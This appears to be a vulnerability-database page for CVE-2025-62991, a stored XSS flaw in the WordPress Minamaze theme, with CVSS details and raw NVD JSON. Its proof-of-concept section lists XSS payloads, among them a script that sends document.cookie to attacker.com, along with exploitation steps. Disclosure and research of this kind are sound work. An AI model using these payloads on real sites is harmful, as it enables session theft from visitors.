Security Vulnerability Report
中文
CVE-2025-62991 CVSS 6.5 MEDIUM

CVE-2025-62991

Published: 2025-12-31 12:16:19
Last Modified: 2026-04-23 15:34:55

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in thinkupthemes Minamaze minamaze allows Stored XSS.This issue affects Minamaze: from n/a through <= 1.10.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

thinkupthemes Minamaze <= 1.10.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-62991 PoC - Minamaze Theme Stored XSS --> <!-- 存储型XSS payload,适用于主题选项或任何文本输入字段 --> <!-- 基础XSS payload --> <script>alert('XSS')</script> <!-- 窃取Cookie的payload --> <script>fetch('https://attacker.com/steal?c='+document.cookie)</script> <!-- 绕过过滤的变体payload --> <img src=x onerror=alert(document.domain)> <svg/onload=alert(document.cookie)> <details open ontoggle=alert(1)> <!-- 自动传播型XSS payload --> <script>var links=document.getElementsByTagName('a');for(var i=0;i<links.length;i++){links[i].href+='?xss='+encodeURIComponent(document.cookie);}</script> <!-- 利用步骤: 1. 登录WordPress后台(低权限账户即可) 2. 导航至外观 -> 主题选项 3. 在任意文本输入框中插入上述payload 4. 保存设置 5. 访问前台页面触发XSS -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62991", "sourceIdentifier": "[email protected]", "published": "2025-12-31T12:16:18.890", "lastModified": "2026-04-23T15:34:55.417", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in thinkupthemes Minamaze minamaze allows Stored XSS.This issue affects Minamaze: from n/a through <= 1.10.1."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en ThinkUpThemes Minamaze permite XSS Almacenado. Este problema afecta a Minamaze: desde n/d hasta 1.10.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/minamaze/vulnerability/wordpress-minamaze-theme-1-10-1-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}